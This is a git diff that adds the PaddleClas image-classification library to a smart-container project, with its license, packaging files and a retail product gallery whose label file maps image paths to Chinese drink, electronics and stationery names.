diff --git a/Smart_container/PaddleClas/.gitignore b/Smart_container/PaddleClas/.gitignore new file mode 100644 index 0000000..f56c23c --- /dev/null +++ b/Smart_container/PaddleClas/.gitignore @@ -0,0 +1,13 @@ +__pycache__/ +*.pyc +*.sw* +*/workerlog* +checkpoints/ +output*/ +pretrained/ +.ipynb_checkpoints/ +*.ipynb* +_build/ +build/ +log/ +nohup.out diff --git a/Smart_container/PaddleClas/LICENSE b/Smart_container/PaddleClas/LICENSE new file mode 100644 index 0000000..261eeb9 --- /dev/null +++ b/Smart_container/PaddleClas/LICENSE @@ -0,0 +1,201 @@ + Apache License + Version 2.0, January 2004 + http://www.apache.org/licenses/ + + TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION + + 1. Definitions. + + "License" shall mean the terms and conditions for use, reproduction, + and distribution as defined by Sections 1 through 9 of this document. + + "Licensor" shall mean the copyright owner or entity authorized by + the copyright owner that is granting the License. + + "Legal Entity" shall mean the union of the acting entity and all + other entities that control, are controlled by, or are under common + control with that entity. For the purposes of this definition, + "control" means (i) the power, direct or indirect, to cause the + direction or management of such entity, whether by contract or + otherwise, or (ii) ownership of fifty percent (50%) or more of the + outstanding shares, or (iii) beneficial ownership of such entity. + + "You" (or "Your") shall mean an individual or Legal Entity + exercising permissions granted by this License. + + "Source" form shall mean the preferred form for making modifications, + including but not limited to software source code, documentation + source, and configuration files. + + "Object" form shall mean any form resulting from mechanical + transformation or translation of a Source form, including but + not limited to compiled object code, generated documentation, + and conversions to other media types. 
+ + "Work" shall mean the work of authorship, whether in Source or + Object form, made available under the License, as indicated by a + copyright notice that is included in or attached to the work + (an example is provided in the Appendix below). + + "Derivative Works" shall mean any work, whether in Source or Object + form, that is based on (or derived from) the Work and for which the + editorial revisions, annotations, elaborations, or other modifications + represent, as a whole, an original work of authorship. For the purposes + of this License, Derivative Works shall not include works that remain + separable from, or merely link (or bind by name) to the interfaces of, + the Work and Derivative Works thereof. + + "Contribution" shall mean any work of authorship, including + the original version of the Work and any modifications or additions + to that Work or Derivative Works thereof, that is intentionally + submitted to Licensor for inclusion in the Work by the copyright owner + or by an individual or Legal Entity authorized to submit on behalf of + the copyright owner. For the purposes of this definition, "submitted" + means any form of electronic, verbal, or written communication sent + to the Licensor or its representatives, including but not limited to + communication on electronic mailing lists, source code control systems, + and issue tracking systems that are managed by, or on behalf of, the + Licensor for the purpose of discussing and improving the Work, but + excluding communication that is conspicuously marked or otherwise + designated in writing by the copyright owner as "Not a Contribution." + + "Contributor" shall mean Licensor and any individual or Legal Entity + on behalf of whom a Contribution has been received by Licensor and + subsequently incorporated within the Work. + + 2. Grant of Copyright License. 
Subject to the terms and conditions of + this License, each Contributor hereby grants to You a perpetual, + worldwide, non-exclusive, no-charge, royalty-free, irrevocable + copyright license to reproduce, prepare Derivative Works of, + publicly display, publicly perform, sublicense, and distribute the + Work and such Derivative Works in Source or Object form. + + 3. Grant of Patent License. Subject to the terms and conditions of + this License, each Contributor hereby grants to You a perpetual, + worldwide, non-exclusive, no-charge, royalty-free, irrevocable + (except as stated in this section) patent license to make, have made, + use, offer to sell, sell, import, and otherwise transfer the Work, + where such license applies only to those patent claims licensable + by such Contributor that are necessarily infringed by their + Contribution(s) alone or by combination of their Contribution(s) + with the Work to which such Contribution(s) was submitted. If You + institute patent litigation against any entity (including a + cross-claim or counterclaim in a lawsuit) alleging that the Work + or a Contribution incorporated within the Work constitutes direct + or contributory patent infringement, then any patent licenses + granted to You under this License for that Work shall terminate + as of the date such litigation is filed. + + 4. Redistribution. 
You may reproduce and distribute copies of the + Work or Derivative Works thereof in any medium, with or without + modifications, and in Source or Object form, provided that You + meet the following conditions: + + (a) You must give any other recipients of the Work or + Derivative Works a copy of this License; and + + (b) You must cause any modified files to carry prominent notices + stating that You changed the files; and + + (c) You must retain, in the Source form of any Derivative Works + that You distribute, all copyright, patent, trademark, and + attribution notices from the Source form of the Work, + excluding those notices that do not pertain to any part of + the Derivative Works; and + + (d) If the Work includes a "NOTICE" text file as part of its + distribution, then any Derivative Works that You distribute must + include a readable copy of the attribution notices contained + within such NOTICE file, excluding those notices that do not + pertain to any part of the Derivative Works, in at least one + of the following places: within a NOTICE text file distributed + as part of the Derivative Works; within the Source form or + documentation, if provided along with the Derivative Works; or, + within a display generated by the Derivative Works, if and + wherever such third-party notices normally appear. The contents + of the NOTICE file are for informational purposes only and + do not modify the License. You may add Your own attribution + notices within Derivative Works that You distribute, alongside + or as an addendum to the NOTICE text from the Work, provided + that such additional attribution notices cannot be construed + as modifying the License. 
+ + You may add Your own copyright statement to Your modifications and + may provide additional or different license terms and conditions + for use, reproduction, or distribution of Your modifications, or + for any such Derivative Works as a whole, provided Your use, + reproduction, and distribution of the Work otherwise complies with + the conditions stated in this License. + + 5. Submission of Contributions. Unless You explicitly state otherwise, + any Contribution intentionally submitted for inclusion in the Work + by You to the Licensor shall be under the terms and conditions of + this License, without any additional terms or conditions. + Notwithstanding the above, nothing herein shall supersede or modify + the terms of any separate license agreement you may have executed + with Licensor regarding such Contributions. + + 6. Trademarks. This License does not grant permission to use the trade + names, trademarks, service marks, or product names of the Licensor, + except as required for reasonable and customary use in describing the + origin of the Work and reproducing the content of the NOTICE file. + + 7. Disclaimer of Warranty. Unless required by applicable law or + agreed to in writing, Licensor provides the Work (and each + Contributor provides its Contributions) on an "AS IS" BASIS, + WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or + implied, including, without limitation, any warranties or conditions + of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A + PARTICULAR PURPOSE. You are solely responsible for determining the + appropriateness of using or redistributing the Work and assume any + risks associated with Your exercise of permissions under this License. + + 8. Limitation of Liability. 
In no event and under no legal theory, + whether in tort (including negligence), contract, or otherwise, + unless required by applicable law (such as deliberate and grossly + negligent acts) or agreed to in writing, shall any Contributor be + liable to You for damages, including any direct, indirect, special, + incidental, or consequential damages of any character arising as a + result of this License or out of the use or inability to use the + Work (including but not limited to damages for loss of goodwill, + work stoppage, computer failure or malfunction, or any and all + other commercial damages or losses), even if such Contributor + has been advised of the possibility of such damages. + + 9. Accepting Warranty or Additional Liability. While redistributing + the Work or Derivative Works thereof, You may choose to offer, + and charge a fee for, acceptance of support, warranty, indemnity, + or other liability obligations and/or rights consistent with this + License. However, in accepting such obligations, You may act only + on Your own behalf and on Your sole responsibility, not on behalf + of any other Contributor, and only if You agree to indemnify, + defend, and hold each Contributor harmless for any liability + incurred by, or claims asserted against, such Contributor by reason + of your accepting any such warranty or additional liability. + + END OF TERMS AND CONDITIONS + + APPENDIX: How to apply the Apache License to your work. + + To apply the Apache License to your work, attach the following + boilerplate notice, with the fields enclosed by brackets "[]" + replaced with your own identifying information. (Don't include + the brackets!) The text should be enclosed in the appropriate + comment syntax for the file format. We also recommend that a + file or class name and description of purpose be included on the + same "printed page" as the copyright notice for easier + identification within third-party archives. 
+ + Copyright [yyyy] [name of copyright owner] + + Licensed under the Apache License, Version 2.0 (the "License"); + you may not use this file except in compliance with the License. + You may obtain a copy of the License at + + http://www.apache.org/licenses/LICENSE-2.0 + + Unless required by applicable law or agreed to in writing, software + distributed under the License is distributed on an "AS IS" BASIS, + WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + See the License for the specific language governing permissions and + limitations under the License. diff --git a/Smart_container/PaddleClas/MANIFEST.in b/Smart_container/PaddleClas/MANIFEST.in new file mode 100644 index 0000000..b0a4f6d --- /dev/null +++ b/Smart_container/PaddleClas/MANIFEST.in @@ -0,0 +1,7 @@ +include LICENSE.txt +include README.md +include docs/en/whl_en.md +recursive-include deploy/python predict_cls.py preprocess.py postprocess.py det_preprocess.py +recursive-include deploy/utils get_image_list.py config.py logger.py predictor.py + +recursive-include ppcls/ *.py *.txt \ No newline at end of file diff --git a/Smart_container/PaddleClas/__init__.py b/Smart_container/PaddleClas/__init__.py new file mode 100644 index 0000000..b8b4361 --- /dev/null +++ b/Smart_container/PaddleClas/__init__.py @@ -0,0 +1,16 @@ +# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. 
+ +__all__ = ['PaddleClas'] +from .paddleclas import PaddleClas diff --git a/Smart_container/PaddleClas/dataset/retail/data_update.txt b/Smart_container/PaddleClas/dataset/retail/data_update.txt new file mode 100644 index 0000000..b0678d2 --- /dev/null +++ b/Smart_container/PaddleClas/dataset/retail/data_update.txt @@ -0,0 +1,189 @@ +gallery/HUAWEI_WATCH_3_Pro.jpg HUAWEI_WATCH_3_Pro +gallery/iphone_13.jpg iphone_13 +gallery/iQOO_7.jpg iQOO_7 +gallery/Mecoguozhichataotaohongyou.jpg Meco果汁茶桃桃红柚 +gallery/Mecoguozhichataishiqingning.jpg Meco果汁茶泰式青柠 +gallery/Redmi_K40.jpg Redmi_K40 +gallery/VIVO_x27.jpg VIVO_x27 +gallery/VOSSkuangquanshui.jpg VOSS矿泉水 +gallery/Xiaomi_Civi.jpg Xiaomi_Civi +gallery/qixi330ml.jpg 七喜330ml +gallery/sandeliwulongcha.jpg 三得利乌龙茶 +gallery/dongfangshuyewulongcha.jpg 东方树叶乌龙茶 +gallery/dongfangshuyehongcha.jpg 东方树叶红茶 +gallery/dongfangshuyemolihuacha.jpg 东方树叶茉莉花茶 +gallery/dongpengteyinpingzhuang.jpg 东鹏特饮瓶装 +gallery/dongpengteyinzuhezhuang.jpg 东鹏特饮组合装 +gallery/rusuanjun600yi_2.jpg 乳酸菌600亿_2 +gallery/rusuanjun600yi_3.jpg 乳酸菌600亿_3 +gallery/rusuanjun600yiyuanwei.jpg 乳酸菌600亿原味 +gallery/rusuanjun600yimangguo.jpg 乳酸菌600亿芒果 +gallery/rusuanjun600yiluhui.jpg 乳酸菌600亿芦荟 +gallery/rusuanjun600yicaomei.jpg 乳酸菌600亿草莓 +gallery/rusuanjun600yixigua.jpg 乳酸菌600亿西瓜 +gallery/yilianmuxipingzhuangyuanwei230g.jpg 伊利安慕希瓶装原味230g +gallery/yilianmuxicaomeiweisuannai205g.jpg 伊利安慕希草莓味酸奶205g +gallery/yilianmuxicaomeiyanmaiweisuannai200g.jpg 伊利安慕希草莓燕麦味酸奶200g +gallery/yilianmuxigaoduanyuanwei230ml.jpg 伊利安慕希高端原味230ml +gallery/yilianmuxigaoduanchengfengliwei230ml.jpg 伊利安慕希高端橙凤梨味230ml +gallery/yilichunniunai250ml.jpg 伊利纯牛奶250ml +gallery/youbei.jpg 优倍 +gallery/youlaorujiankangdamai180g_4maixiangyuanwei.jpg 优酪乳健康大麦180g_4麦香原味 +gallery/youlaorujiankangdamai180gcaomeiwei.jpg 优酪乳健康大麦180g草莓味 +gallery/youlaorujiankangdamai180gmaixiangyuanwei.jpg 优酪乳健康大麦180g麦香原味 +gallery/youlaoruweiguoli230gmangguohuangtao.jpg 优酪乳唯果粒230g芒果黄桃 +gallery/youlaoruweiguoli230gluhui.jpg 优酪乳唯果粒230g芦荟 
+gallery/youlaoruweiguoli230gcaomei.jpg 优酪乳唯果粒230g草莓 +gallery/youlaorusijixianxuan180g_4luhui.jpg 优酪乳四季鲜选180g_4芦荟 +gallery/youlaorusijixianxuan180g_4huangtao.jpg 优酪乳四季鲜选180g_4黄桃 +gallery/youlaorusijixianxuan180gluhui.jpg 优酪乳四季鲜选180g芦荟 +gallery/youlaorusijixianxuan180ghuangtao.jpg 优酪乳四季鲜选180g黄桃 +gallery/youlaorumanyidian100g_8yuanwei.jpg 优酪乳慢一点100g_8原味 +gallery/youlaorulvxingyouge220gdanmaizhishiwei.jpg 优酪乳旅行优格220g丹麦芝士味 +gallery/youlaorulvxingyouge220gbaojialiyameiguiwei.jpg 优酪乳旅行优格220g保加利亚玫瑰味 +gallery/youlaorujiandandian100g_8yuanwei.jpg 优酪乳简单点100g_8原味 +gallery/youlaorujiandandian230gbantang.jpg 优酪乳简单点230g半糖 +gallery/youlaorujiandandianyuanwei.jpg 优酪乳简单点原味 +gallery/youlaorujiandandiankaosuannai.jpg 优酪乳简单点烤酸奶 +gallery/youlaorushunchangdian230gyuanwei.jpg 优酪乳顺畅点230g原味 +gallery/banlvjiangyou1L.jpg 伴侣酱油1L +gallery/banlvjiangyou2L.jpg 伴侣酱油2L +gallery/yuanqisenlinruchakafeinatie.jpg 元气森林乳茶咖啡拿铁 +gallery/yuanqisenlinruchanongxiangyuanwei.jpg 元气森林乳茶浓香原味 +gallery/yuanqisenlinruchamoxiangnailv.jpg 元气森林乳茶茉香奶绿 +gallery/yuanqisenlinrusuanjunsudaqipaoshui.jpg 元气森林乳酸菌苏打气泡水 +gallery/yuanqisenlinwutangqiamanjuweisudaqipaoshui.jpg 元气森林无糖卡曼橘味苏打气泡水 +gallery/yuanqisenlinwutangbaitaoweisudaqipaoshui.jpg 元气森林无糖白桃味苏打气泡水 +gallery/yuanqisenlinyinghuaputaosudaqipaoshui.jpg 元气森林樱花葡萄苏打气泡水 +gallery/yuanqisenlinranchawutangtaoxiangwulongcha.jpg 元气森林燃茶无糖桃香乌龙茶 +gallery/yuanqisenlinranchawutangchunxiangwulongcha.jpg 元气森林燃茶无糖醇香乌龙茶 +gallery/yuanqisenlinranchaxuanmiwulongcha.jpg 元气森林燃茶玄米乌龙茶 +gallery/yuanqisenlinbaitaoweisudaqipaoshui.jpg 元气森林白桃味苏打气泡水 +gallery/yuanqisenlinsuanmeizhisudaqipaoshui.jpg 元气森林酸梅汁苏打气泡水 +gallery/yuanqisenlinqingguaweisudaqipaoshui.jpg 元气森林青瓜味苏打气泡水 +gallery/guangminglimai.jpg 光明藜麦 +gallery/guangmingxianniunai.jpg 光明鲜牛奶 +gallery/yangleduo.jpg 养乐多 +gallery/yangleduozuhezhuang.jpg 养乐多组合装 +gallery/nongfushanquan17.5.jpg 农夫山泉17.5 +gallery/nongfushanquanNFC.jpg 农夫山泉NFC +gallery/nongfushanquanweitamingshuirusuanjunfengwei.jpg 农夫山泉维他命水乳酸菌风味 
+gallery/nongfushanquanweitamingshuiganjufengwei.jpg 农夫山泉维他命水柑橘风味 +gallery/nongfushanquanweitamingshuiningmengfengwei.jpg 农夫山泉维他命水柠檬风味 +gallery/nongfushanquanweitamingshuiredaishuiguofengwei.jpg 农夫山泉维他命水热带水果风味 +gallery/nongfushanquanweitamingshuishiliulanmeifengwei.jpg 农夫山泉维他命水石榴蓝莓风味 +gallery/nongfushanquanweitamingshuilanmeishumeiwei.jpg 农夫山泉维他命水蓝莓树莓味 +gallery/guanyiru.jpg 冠益乳 +gallery/binglukuangquanshuizuhezhuang.jpg 冰露矿泉水组合装 +gallery/bingluchunyuekuangquanshui.jpg 冰露纯悦矿泉水 +gallery/kaixuan1664blancpijiupingzhuang.jpg 凯旋1664blanc啤酒瓶装 +gallery/kaixuan1664blancpijiuguanpi.jpg 凯旋1664blanc啤酒罐啤 +gallery/wuhouhongchaningmengwei.jpg 午后红茶柠檬味 +gallery/huaweiMate_40.jpg 华为Mate_40 +gallery/huaweiP50_Pro.jpg 华为P50_Pro +gallery/xiaomi11.jpg 小米11 +gallery/jianjiaoduotaixing.jpg 尖叫多肽型 +gallery/kangshifubingtangwulongcha.jpg 康师傅冰糖乌龙茶 +gallery/kangshifubingtangningmeng.jpg 康师傅冰糖柠檬 +gallery/kangshifubingtangxueli.jpg 康师傅冰糖雪梨 +gallery/kangshifubinghongcha.jpg 康师傅冰红茶 +gallery/kangshifubinglvcha.jpg 康师傅冰绿茶 +gallery/kangshifulvcha.jpg 康师傅绿茶 +gallery/kangshifumoliyoucha.jpg 康师傅茉莉柚茶 +gallery/kangshifumoliqingcha.jpg 康师傅茉莉清茶 +gallery/kangshifufengmiyouzi.jpg 康师傅蜂蜜柚子 +gallery/deliqiatongchangweipiaojia.jpg 得力卡通长尾票夹 +gallery/deliwenjianjia.jpg 得力文件夹 +gallery/wangziniunai.jpg 旺仔牛奶 +gallery/mingzhichunyi_youyang.jpg 明治醇壹_优漾 +gallery/xingbake250mlkafeinatie.jpg 星巴克250ml咖啡拿铁 +gallery/xingbake250mlmochanatie.jpg 星巴克250ml抹茶拿铁 +gallery/xingbake250mlxiangcaonatie.jpg 星巴克250ml香草拿铁 +gallery/yeshupaiyezhi.jpg 椰树牌椰汁 +gallery/xinheshousicu245ML.jpg 欣和寿司醋245ML +gallery/meiriCguoshuzhi300mlshumeihongtiancai.jpg 每日C果蔬汁300ml树莓红甜菜 +gallery/meiriCguoshuzhi300mlbaixiangguonangua.jpg 每日C果蔬汁300ml百香果南瓜 +gallery/meiriCguoshuzhi300mljinjieyuyiganlan.jpg 每日C果蔬汁300ml金桔羽衣甘蓝 +gallery/meiriCchengzhi300ml.jpg 每日C橙汁300ml +gallery/meiriCchunguozhiguoxiancheng.jpg 每日C纯果汁果纤橙 +gallery/meiriCchunguozhitaozhi.jpg 每日C纯果汁桃汁 +gallery/meiriCchunguozhichengzhi.jpg 每日C纯果汁橙汁 +gallery/meiriCchunguozhihuluobuzhi.jpg 每日C纯果汁胡萝卜汁 
+gallery/meiriCchunguozhimangguo.jpg 每日C纯果汁芒果 +gallery/meiriCchunguozhipingguo.jpg 每日C纯果汁苹果 +gallery/meiriCchunguozhiputao.jpg 每日C纯果汁葡萄 +gallery/meiriCchunguozhiputaoyou.jpg 每日C纯果汁葡萄柚 +gallery/meiyitian.jpg 每益添 +gallery/shuidongletaowei600ml.jpg 水动乐桃味600ml +gallery/faguoyuanzhuangjinkoubalishuiperrieryuanwei.jpg 法国原装进口巴黎水perrier原味 +gallery/faguoyuanzhuangjinkoubalishuiperrierqingning.jpg 法国原装进口巴黎水perrier青柠 +gallery/baishikelewutangguanzhuang.jpg 百事可乐无糖罐装 +gallery/baishikeleguanzhuangsufeng.jpg 百事可乐罐装塑封 +gallery/baiweipijiuhongselvguan.jpg 百威啤酒红色铝罐 +gallery/baiweipijiujinzun550guanpi.jpg 百威啤酒金尊550罐啤 +gallery/baisuishan500ml.jpg 百岁山500ml +gallery/qianzibi.jpg 签字笔 +gallery/tongyilvcha.jpg 统一绿茶 +gallery/meiniandaningmengwei.jpg 美年达柠檬味 +gallery/meiniandachengweiqishui500ml.jpg 美年达橙味汽水500ml +gallery/meiniandachengweiguanzhuang.jpg 美年达橙味罐装 +gallery/meiniandaqingpingguoweiqishui500ml.jpg 美年达青苹果味汽水500ml +gallery/fendayeziweipingzhuang.jpg 芬达椰子味瓶装 +gallery/fendapingguoweipingzhuang.jpg 芬达苹果味瓶装 +gallery/fendapingguoweiguanzhuang.jpg 芬达苹果味罐装 +gallery/fendaboluoweipingzhuang.jpg 芬达菠萝味瓶装 +gallery/fendaputaoweipingzhuang.jpg 芬达葡萄味瓶装 +gallery/fendaputaoweiguanzhuang.jpg 芬达葡萄味罐装 +gallery/fendamitaoweipingzhuang.jpg 芬达蜜桃味瓶装 +gallery/fendamitaoweiguanzhuang.jpg 芬达蜜桃味罐装 +gallery/fendaxiguaweipingzhuang.jpg 芬达西瓜味瓶装 +gallery/fendaxiguaweiguanzhuang.jpg 芬达西瓜味罐装 +gallery/fendalingqiachengweipingzhuang.jpg 芬达零卡橙味瓶装 +gallery/mengniuyouyic.jpg 蒙牛优益c +gallery/mengniuchunzhenpingzhuanghongxiyouweisuannai230g.jpg 蒙牛纯甄瓶装红西柚味酸奶230g +gallery/guwuniuruyinpin300gyanmaiguli.jpg 谷物牛乳饮品300g燕麦谷粒 +gallery/guwuniuruyinpin300ghongdouzimi.jpg 谷物牛乳饮品300g红豆紫米 +gallery/guwuniuruyinpin300glimaiyumi.jpg 谷物牛乳饮品300g藜麦玉米 +gallery/guwuniuruyinpin950gyanmaiguli.jpg 谷物牛乳饮品950g燕麦谷粒 +gallery/guwuniuruyinpin950ghongdouzimi.jpg 谷物牛乳饮品950g红豆紫米 +gallery/haogedengpijiu.jpg 豪格登啤酒 +gallery/beiruisitabarista.jpg 贝瑞斯塔barista +gallery/beinasongmingdizhenxuan250mlxidamo.jpg 贝纳颂名地臻选250ml西达摩 +gallery/beinasongkafeinatie.jpg 贝纳颂咖啡拿铁 
+gallery/beinasongjingdianxilie250mlnatie.jpg 贝纳颂经典系列250ml拿铁 +gallery/beinasongjingdianxilie250mlmoqia.jpg 贝纳颂经典系列250ml摩卡 +gallery/beinasongjingdianxilie250mllanshan.jpg 贝纳颂经典系列250ml蓝山 +gallery/asamunaicha.jpg 阿萨姆奶茶 +gallery/quechaomeijixian.jpg 雀巢美极鲜 +gallery/xuebiguanzhuang.jpg 雪碧罐装 +gallery/xuehua8duyongchuangtianya500mlpingzhuang.jpg 雪花8度勇闯天涯500ml瓶装 +gallery/xuehua8duyongchuangtianya500mlguanpi.jpg 雪花8度勇闯天涯500ml罐啤 +gallery/xuehua8duyongchuangtianyaguanpi_6zuhezhuang.jpg 雪花8度勇闯天涯罐啤_6组合装 +gallery/xuehua8duqingshuang.jpg 雪花8度清爽 +gallery/xuehua9duyongchuangtianya500mlpingzhuang.jpg 雪花9度勇闯天涯500ml瓶装 +gallery/xuehuabingku330mlxiangzhuang.jpg 雪花冰酷330ml箱装 +gallery/xuehuabingku9duguanpi.jpg 雪花冰酷9度罐啤 +gallery/xuehuayongchuangtianyasuperX.jpg 雪花勇闯天涯superX +gallery/xuehuaqingshuang8du330_6guanpizuhezhuang.jpg 雪花清爽8度330_6罐啤组合装 +gallery/xuehuaqingshuang8duxiangzhuang.jpg 雪花清爽8度箱装 +gallery/xuehuajingzhi9du500_6guanpizuhezhuang.jpg 雪花精制9度500_6罐啤组合装 +gallery/xuehuachunsheng500mlpingzhuang.jpg 雪花纯生500ml瓶装 +gallery/xuehuachunsheng500mlzuhezhuang.jpg 雪花纯生500ml组合装 +gallery/xuehuachunshengguanpi.jpg 雪花纯生罐啤 +gallery/xuehualianpuhuadanxilie8du500guanpi.jpg 雪花脸谱花旦系列8度500罐啤 +gallery/qingdaopijiuquanmaibaipi500guanpi.jpg 青岛啤酒全麦白啤500罐啤 +gallery/qingdaopijiuaogute500ml.jpg 青岛啤酒奥古特500ml +gallery/qingdaopijiuxiaozongjin296pingzhuang.jpg 青岛啤酒小棕金296瓶装 +gallery/qingdaopijiudanshuang8du330guanpi.jpg 青岛啤酒淡爽8度330罐啤 +gallery/qingdaopijiuqingchun330ml.jpg 青岛啤酒清醇330ml +gallery/qingdaopijiuchunsheng500mlguanpi.jpg 青岛啤酒纯生500ml罐啤 +gallery/qingdaopijiuchunsheng600mlpingzhuang.jpg 青岛啤酒纯生600ml瓶装 +gallery/qingdaopijiujingdian10du500guanpi.jpg 青岛啤酒经典10度500罐啤 +gallery/qingdaopijiujingdian11du330guanpi.jpg 青岛啤酒经典11度330罐啤 +gallery/qingdaopijiujingdian11duguanpiniuqiazhizuhezhuang.jpg 青岛啤酒经典11度罐啤牛卡纸组合装 +gallery/qingdaopijiuhongyundangtou355pingzhuang.jpg 青岛啤酒鸿运当头355瓶装 +gallery/qingdaopijiuheipijiu500guanpi.jpg 青岛啤酒黑啤酒500罐啤 +gallery/meizu18.jpg 魅族18 +gallery/xiuzhengdai.jpg 修正带 +gallery/jiangxiaobai.jpg 江小白 
+gallery/xiaoyuanbinggan.jpg 小圆饼干 diff --git a/Smart_container/PaddleClas/dataset/retail/gallery/HUAWEI_P30_PRO.jpg b/Smart_container/PaddleClas/dataset/retail/gallery/HUAWEI_P30_PRO.jpg new file mode 100644 index 0000000..141145e Binary files /dev/null and b/Smart_container/PaddleClas/dataset/retail/gallery/HUAWEI_P30_PRO.jpg differ diff --git a/Smart_container/PaddleClas/dataset/retail/gallery/HUAWEI_WATCH_3_Pro.jpg b/Smart_container/PaddleClas/dataset/retail/gallery/HUAWEI_WATCH_3_Pro.jpg new file mode 100644 index 0000000..84ed575 Binary files /dev/null and b/Smart_container/PaddleClas/dataset/retail/gallery/HUAWEI_WATCH_3_Pro.jpg differ diff --git a/Smart_container/PaddleClas/dataset/retail/gallery/Mecoguozhichataishiqingning.jpg b/Smart_container/PaddleClas/dataset/retail/gallery/Mecoguozhichataishiqingning.jpg new file mode 100644 index 0000000..7ff542d Binary files /dev/null and b/Smart_container/PaddleClas/dataset/retail/gallery/Mecoguozhichataishiqingning.jpg differ diff --git a/Smart_container/PaddleClas/dataset/retail/gallery/Mecoguozhichataotaohongyou.jpg b/Smart_container/PaddleClas/dataset/retail/gallery/Mecoguozhichataotaohongyou.jpg new file mode 100644 index 0000000..6b5699c Binary files /dev/null and b/Smart_container/PaddleClas/dataset/retail/gallery/Mecoguozhichataotaohongyou.jpg differ diff --git a/Smart_container/PaddleClas/dataset/retail/gallery/Redmi_K40.jpg b/Smart_container/PaddleClas/dataset/retail/gallery/Redmi_K40.jpg new file mode 100644 index 0000000..e735961 Binary files /dev/null and b/Smart_container/PaddleClas/dataset/retail/gallery/Redmi_K40.jpg differ diff --git a/Smart_container/PaddleClas/dataset/retail/gallery/VIVO_x27.jpg b/Smart_container/PaddleClas/dataset/retail/gallery/VIVO_x27.jpg new file mode 100644 index 0000000..15b436c Binary files /dev/null and b/Smart_container/PaddleClas/dataset/retail/gallery/VIVO_x27.jpg differ diff --git a/Smart_container/PaddleClas/dataset/retail/gallery/VOSSkuangquanshui.jpg 
b/Smart_container/PaddleClas/dataset/retail/gallery/VOSSkuangquanshui.jpg new file mode 100644 index 0000000..2f50c70 Binary files /dev/null and b/Smart_container/PaddleClas/dataset/retail/gallery/VOSSkuangquanshui.jpg differ diff --git a/Smart_container/PaddleClas/dataset/retail/gallery/Xiaomi_Civi.jpg b/Smart_container/PaddleClas/dataset/retail/gallery/Xiaomi_Civi.jpg new file mode 100644 index 0000000..2eaaf9b Binary files /dev/null and b/Smart_container/PaddleClas/dataset/retail/gallery/Xiaomi_Civi.jpg differ diff --git a/Smart_container/PaddleClas/dataset/retail/gallery/airpods2.jpg b/Smart_container/PaddleClas/dataset/retail/gallery/airpods2.jpg new file mode 100644 index 0000000..ff91780 Binary files /dev/null and b/Smart_container/PaddleClas/dataset/retail/gallery/airpods2.jpg differ diff --git a/Smart_container/PaddleClas/dataset/retail/gallery/asamunaicha.jpg b/Smart_container/PaddleClas/dataset/retail/gallery/asamunaicha.jpg new file mode 100644 index 0000000..68e341c Binary files /dev/null and b/Smart_container/PaddleClas/dataset/retail/gallery/asamunaicha.jpg differ diff --git a/Smart_container/PaddleClas/dataset/retail/gallery/baishikeleguanzhuangsufeng.jpg b/Smart_container/PaddleClas/dataset/retail/gallery/baishikeleguanzhuangsufeng.jpg new file mode 100644 index 0000000..8bcddf0 Binary files /dev/null and b/Smart_container/PaddleClas/dataset/retail/gallery/baishikeleguanzhuangsufeng.jpg differ diff --git a/Smart_container/PaddleClas/dataset/retail/gallery/baishikelewutangguanzhuang.jpg b/Smart_container/PaddleClas/dataset/retail/gallery/baishikelewutangguanzhuang.jpg new file mode 100644 index 0000000..51b74f6 Binary files /dev/null and b/Smart_container/PaddleClas/dataset/retail/gallery/baishikelewutangguanzhuang.jpg differ diff --git a/Smart_container/PaddleClas/dataset/retail/gallery/baisuishan500ml.jpg b/Smart_container/PaddleClas/dataset/retail/gallery/baisuishan500ml.jpg new file mode 100644 index 0000000..6eefaaa Binary files /dev/null and 
b/Smart_container/PaddleClas/dataset/retail/gallery/baisuishan500ml.jpg differ diff --git a/Smart_container/PaddleClas/dataset/retail/gallery/baiweipijiuhongselvguan.jpg b/Smart_container/PaddleClas/dataset/retail/gallery/baiweipijiuhongselvguan.jpg new file mode 100644 index 0000000..e581e3f Binary files /dev/null and b/Smart_container/PaddleClas/dataset/retail/gallery/baiweipijiuhongselvguan.jpg differ diff --git a/Smart_container/PaddleClas/dataset/retail/gallery/baiweipijiujinzun550guanpi.jpg b/Smart_container/PaddleClas/dataset/retail/gallery/baiweipijiujinzun550guanpi.jpg new file mode 100644 index 0000000..0cceb94 Binary files /dev/null and b/Smart_container/PaddleClas/dataset/retail/gallery/baiweipijiujinzun550guanpi.jpg differ diff --git a/Smart_container/PaddleClas/dataset/retail/gallery/banlvjiangyou1L.jpg b/Smart_container/PaddleClas/dataset/retail/gallery/banlvjiangyou1L.jpg new file mode 100644 index 0000000..ba27281 Binary files /dev/null and b/Smart_container/PaddleClas/dataset/retail/gallery/banlvjiangyou1L.jpg differ diff --git a/Smart_container/PaddleClas/dataset/retail/gallery/banlvjiangyou2L.jpg b/Smart_container/PaddleClas/dataset/retail/gallery/banlvjiangyou2L.jpg new file mode 100644 index 0000000..e9a49a7 Binary files /dev/null and b/Smart_container/PaddleClas/dataset/retail/gallery/banlvjiangyou2L.jpg differ diff --git a/Smart_container/PaddleClas/dataset/retail/gallery/beinasongjingdianxilie250mllanshan.jpg b/Smart_container/PaddleClas/dataset/retail/gallery/beinasongjingdianxilie250mllanshan.jpg new file mode 100644 index 0000000..8ea8185 Binary files /dev/null and b/Smart_container/PaddleClas/dataset/retail/gallery/beinasongjingdianxilie250mllanshan.jpg differ diff --git a/Smart_container/PaddleClas/dataset/retail/gallery/beinasongjingdianxilie250mlmoqia.jpg b/Smart_container/PaddleClas/dataset/retail/gallery/beinasongjingdianxilie250mlmoqia.jpg new file mode 100644 index 0000000..20c6f3f Binary files /dev/null and 
